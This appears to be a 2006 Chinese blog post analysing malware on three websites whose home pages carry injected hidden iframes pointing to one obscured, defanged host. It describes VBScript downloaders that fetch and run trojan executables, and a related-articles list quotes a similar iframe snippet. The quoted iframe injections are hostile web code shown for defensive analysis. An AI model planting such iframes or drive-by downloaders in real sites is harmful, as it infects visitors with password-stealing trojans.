3个网站被挂上的木马出自一家

最新推荐文章于 2020-05-08 17:47:26 发布
最新推荐文章于 2020-05-08 17:47:26 发布
阅读量1.8k 收藏
点赞数
分类专栏: 系统安全 文章标签: vbscript 脚本 iframe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1237933
版权

endurer 原创

2006-09-18 第1

第1个网站 首页被加入的的代码:
/-------
<iframe src='htxxp://www.***.why***all.com/1' width='0' height='0' frameborder='0'></iframe>
-------/

1.htm  内容为加入多余空格的VBScript脚本代码。(瑞星报为: Trojan.DL.VBS.Agent.r,Kaserpsky报为:Trojan-Downloader.JS.Agent.ba

该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 htxxp://www.***.why***all.com/1/test.exe,保存为 %temp% 中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

test.exe 采用 nSPack 1.3 -> North Star/Liu Xing Ping 加壳,长度为 85,930 字节。Kaserpsky报为:Trojan-PSW.Win32.WOW.iu

 

第2个网站 首页被加入的的代码:
/-------
<iframe src='htxxp://www.***.why***all.com/2' width='0' height='0' frameborder='0'></iframe>
-------/

2.htm 内容为加入多余空格的VBScript脚本代码。(瑞星报为: Trojan.DL.VBS.Agent.r,Kaserpsky报为:Trojan-Downloader.JS.Agent.ba

该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 htxxp://www.***.why***all.com/2/du.exe,保存为 %temp% 中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

du.exe  采用 nSPack 1.3 -> North Star/Liu Xing Ping 加壳,文件大小为12,286 字节,
Kaserpsky报为:Trojan-Downloader.Win32.Delf.aul,瑞星报为: Trojan.DL.Delf.cwh

 

第3个网站  首页被加入的的代码:
/-------
<iframe src='htxxp://www.***.why***all.com/3' width='0' height='0' frameborder='0'></iframe>
-------/

3.htm 内容为加入多余空格的VBScript脚本代码。(瑞星报为: Trojan.DL.VBS.Agent.r,Kaserpsky报为:Trojan-Downloader.JS.Agent.ba

该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 htxxp://www.***.why***all.com/3/du.exe,保存为 %temp% 中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

du.exe 与2.htm下载的相同。 

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
php网站木马后的修复方法总结
10-25
主要介绍了php网站木马后的修复方法,总结分析了Linux与Windows系统上木马的查杀方法,并给出了一个完整的木马查找工具实例,需要的朋友可以参考下
在线视频下载10个妙招方法大全
weixin_30647065的博客
07-18 7582
在线视频下载10个妙招方法大全 一、使用傲游浏览器下载视频 如今,使用傲游浏览器的用户非常多,那么在观看在线视频时如何快速进行下载呢?答案很简单,我们不用借助任何工具,最新的傲游2.1版以上的浏览器本身就具有嗅探和下载在线视频的功能(2.0版的具有嗅探功能,但是浏览器本身不提供下载功能)。首先在浏览器地址栏打开在线视频网站,并正常播放,这时,只要调用Maxt...
在线视频下载网址合集
热门推荐
Laic Zhang的博客
09-09 70万+
视频鱼:http://m.shipinyu.cn/ 微博党:http://weibodang.cn/index 硕鼠:http://www.flvcd.com/ 微博秒拍视频解析下载:https://weibo.iiilab.com/ 短视频解析下载:http://dy.ck921.com/ 飞狐视频下载:https://www.3987.com/dsp/ks.html 兔兔解析:http://w...
用手机看在线视频
猪哥亮
07-22 3万+
    目前很多网站都提供了视频的在线观看,这些视频中有相当一大部分都非常有意思,可惜的是我们的手机上目前还不支持FLA的文件格式的播放,我们要么只能在电脑上看,要么只能在电脑上将FLA格式的文件转换为AVI格式后才能观看。微软预计要今年年底才能推出全功能IEMobile,到那个时候什么也不用安装就可以直接看在线视频啦!  现在我给出的解决方案是给万能播放器上又增加了一个插件,拥有它之后,你就
网站木马了,假的,js从那儿出来的
jjzaihaozhe的专栏
06-02 4972
今天使用搜狗高速浏览器无意查看我们网站的源码,不看不知道,一看吓一跳,前部和尾部均多出来很多js,可能是木马了,这是我的第一个意识。
防范ASP木马的十大基本原则
可爱是名词吗?
11-07 768
 由于ASP它本身是服务器提供的一贡服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求.   几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧,特别是虚拟主机的用户都遇
ASP网站中数据库被木马的解决方案
01-02
本文我们详细介绍了ASP数据库被木马的详细解决方案之编程处理的方法,解决方案分为以下三步: 第一步: 为现有数据库做好备份。 第二步: 执行如下ASP文件,这样就可以去掉数据库当中的JS木马: 注:conn.asp自己...
五个方面何防止网站木马.php
12-12
五个方面何防止网站木马.php 五个方面何防止网站木马.php
网站被黑入侵被马跳转如何解决?
网站安全专家
06-03 1万+
昨天,发现客户的公司官网被黑了,标题是正常的,点击进去却跳转到了博彩网站。这里记录一下,我的解决方法。(不一定适用每一个网站)首先是主页在百度排名的显示情况,如下图被修改之后(百度更新也太及时了,上午发现的下午就更新了。):为什么明明标题被修改,但是在上面显示的还是之前我们自己设置的?主要是加入了以下的代码:我测试了一下,大家可以看看:而后被修改的标题是经过编码转换放入的:我的解决措施:1、修改f...
shell日常实战——检查网站是否被木马
pencilseo的博客
08-06 893
作者简介: 陈志珂(头条号:强扭的瓜不好吃)目前就职于中国最大的安卓应用软件公司,任高级工程师,现在公司任php开发工程师,python开发工程师,高级运维工程师,公众号“铅笔学园”运维内容合作作者之一。 铅笔学园:IT资源分享|知识分享,做初级程序员的指明灯 #!/bin/bash path=/var/html [ -d /test/md5 ] || mkdir -...
我的网站被黑了,关键词被劫持,总结一下是怎么解决的。
weixin_30535843的博客
04-26 1159
1、发现被黑,网站被黑的症状 两年前自己用wordpress搭了一个网站,平时没事写写文章玩玩。但是前些日子,突然发现网站的流量突然变小,site了一下百度收录,发现出了大问题,网站被黑了。大多数百度抓取收录的页面title和description被篡改,如下图,title标题被改成xx友情链接,描述description是一些广告网址。但是点进去以后,访问正常,页面显示正常,页面源...
常见JS马方法及如何防止网站被黑客马?
吸星大法--吸百家武学之精华。大成也
09-22 6999
最近有朋友说自己的网站平时并未作弊,文章也都是原创的,更新很稳定。可不知道为什么网站突然就被各大搜索引擎降权了,一直找不到原因。最后发现是网站马了,导致网站被连累了。在此,借助seo思维博客的平台,给大家简单的介绍下js马的方法及如何防止网站马。 现在最多见的JS马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的脚本就会通过
一个被木马的论坛
caobihole
07-21 366
endurer 原创 2006-07-21 第1版 论坛首页被加入:------------------<iframe src="hxxp://msbyl***.***go1.icpcn.com/" width="0" height="0" frameborder="0"></iframe>------------------ hxxp://msbyl***.***go1.icpcn.com...
VB控件数组的操作技巧(混合文本)
caobin518的专栏
07-20 5081
2011-3-22 9:31:00 VB控件数组的操作技巧 ━━━━━━━━━━━━━━━━━━━━━━━━━━     控件数组有在设计时设置好的,也有在运行中创建的。控件数组一方面使得程序简洁、令代码易于维护,另一方面能使程序具有灵活性。可见,科学地利用控件数组可使编程工作的
公司网站木马处理过程
Akay的Web技术博客
03-22 1772
2010年3月22日早上8:45左右发现公司的www.jinshiqi.net网站木马。症状:打开时网页出现错位和乱码,360浏览器提示有木马。查看源码发现页面源码的最后部分被加上了一段js外部调用的代码。用FTP连接到网站空间,发现被马的页面文件更新日期还是一两个月以前的,没有修改。解决:赶紧把备份的源文件替换上去,再访问,一切正常。疑问:网站只有一个html页面,黑客是怎么入
Web安全-一句话木马
道阻且长,行则将至。
05-08 31万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
网站马实用怎么解决的办法之一
网站安全专家
06-11 9889
最近单位网站在百度搜索点击打开都是SQ电影的内容,而直接输入网址反而没问题,在百度搜索中被提示为网站被黑的可能,很多客户搜索我们网站都进入了SQ电影网站,给公司的形象造成了很大的影响,作为公司的网站技术人员,以前也算是搞了5年的老站长了,什么事没惊着,从头开始分析网站被黑的原因。
python 调用海康SDK,登录,设置回调,布防,撤防,注销以及释放SDK
caobin0825的博客
03-23 1万+
import os import ctypes import datetime import time #获取所有的库文件到一个列表 path = "/home/caobin/chike/chike/CH_HCNetSDK_V5.2.7.4_build20170606_Linux64/lib/" so_list = [] def add_so(path,so_list): files = ...
染上了木马病毒的网站是什么网站
最新发布
05-19
任何网站都可能染上木马病毒,尤其是那些没有得到充分保护的网站。一些危险的网站可能包括非法的下载站点、成人网站、盗版软件站点、以及未经验证的第三方应用和插件下载站点等。此外,如果你不小心点击了一封垃圾...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值